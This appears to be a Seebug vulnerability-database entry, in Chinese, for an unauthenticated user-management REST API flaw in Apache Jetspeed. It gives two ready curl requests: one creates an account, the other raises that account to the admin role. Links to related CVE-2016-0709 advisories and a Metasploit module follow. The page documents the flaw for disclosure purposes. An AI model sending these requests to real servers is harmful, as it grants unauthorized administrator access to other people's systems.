Lucene search
RootSSV:90922HistoryMar 07, 2016 - 12:00 a.m.
Apache Jetspeed 用户管理 REST API 未授权访问漏洞
2016-03-0700:00:00
Root
www.seebug.org
42
0.217 Low
EPSS
Percentile
96.5%
漏洞效果
用户管理 REST API 未授权
构造用户管理 REST API 创建用户 foobar:
curl -i "http://192.168.199.152:8080/jetspeed/services/usermanager/users/?_type=json&name=foobar&password=password&password_confirm=password&user_name_given=foo&user_name_family=bar&[email protected]&newrule=" -X POST
构造用户管理 REST API 提升用户 foobar 为管理员:
curl -i "http://192.168.199.152:8080/jetspeed/services/usermanager/users/foobar/?_type=json&name=&password=&password_confirm=&user_name_given=&user_name_family=&user_email=&user_enabled=true&roles=admin&rule=" -X POST
随后可使用 foobar:password 登录,并且为管理员权限:
关联漏洞
参考链接:
[1] http://haxx.ml/post/140552592371/remote-code-execution-in-apache-jetspeed-230-and
[2] https://portals.apache.org/jetspeed-2/security-reports.html
Related
github
github
Path Traversal in Apache Jetspeed
2022-05-17 03:56:49
nvd
nvd
CVE-2016-0709
2016-04-11 14:59:01
cve
cve
CVE-2016-0709
2016-04-11 14:59:01
osv
osv
Path Traversal in Apache Jetspeed
2022-05-17 03:56:49
prion
prion
Directory traversal
2016-04-11 14:59:00
checkpoint_advisories
checkpoint_advisories
Apache Jetspeed Remote Code Execution (CVE-2016-0709)
2016-04-18 00:00:00
cvelist
cvelist
CVE-2016-0709
2016-04-11 14:00:00
zdt
zdt
Apache Jetspeed - Arbitrary File Upload (Metasploit)
2016-03-31 00:00:00
packetstorm
packetstorm
Apache Jetspeed Arbitrary File Upload
2016-03-31 00:00:00
metasploit
metasploit
Apache Jetspeed Arbitrary File Upload
2016-03-24 00:22:32
exploitdb
exploitdb
Apache Jetspeed - Arbitrary File Upload (Metasploit)
2016-03-31 00:00:00
openvas
openvas
Apache Jetspeed Multiple Vulnerabilities (Mar 2016)
2016-04-01 00:00:00
ibm
ibm